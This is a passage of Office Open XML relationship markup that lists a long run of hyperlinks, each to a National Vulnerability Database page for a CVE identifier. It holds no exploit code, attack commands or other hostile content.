Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79952" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79961" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79964" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79965" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79971" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80174" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80339" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80340" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81021" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81022" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81162" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81269" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81647" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82184" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82530" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82848" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83537" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84222" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84908" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85037" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85090" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85392" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86200" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86202" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86436" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86743" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86747" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86752" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86753" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86755" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86756" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86760" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86761" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86767" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86768" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86773" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87435" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87439" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87453" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87518" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87523" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87566" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87594" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87605" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-7062" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53760" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21106" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21112" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53720" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56126" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56128" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81887" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82911" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84305" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84967" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86256" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86740" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86742" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86745" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86763" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86772" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87083" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55067" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55425" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61910" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88001" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19729" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19800" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19944" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52832" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63179" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-3271" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21086" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21113" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49309" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53529" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77506" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80440" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81167" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84310" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84311" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87463" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87597" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53636" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56136" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80171" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81741" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87555" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87602" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53468" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86776" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49830" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61790" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75526" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77643" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78486" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79731" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79735" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80055" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11838" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14892" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15398" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19802" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19946" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33047" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41262" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52730" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53487" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53541" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53584" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54614" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55064" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55227" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55468" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55696" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55834" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61663" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61907" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61909" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61911" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62249" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62986" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71807" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75601" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75905" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79387" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79515" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81644" TargetMode="External" Id="rId1124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82185" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85132" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8615" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86342" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86417" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86441" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86451" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86769" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87012" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87013" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87017" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87019" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87032" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87035" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87046" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87449" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87461" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87466" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87469" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87495" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87497" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87508" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87511" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87516" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87543" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87546" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87548" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87550" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87551" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87556" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87557" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87560" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87561" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87562" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87563" TargetMode="External" Id="rId1159" /><Relationship 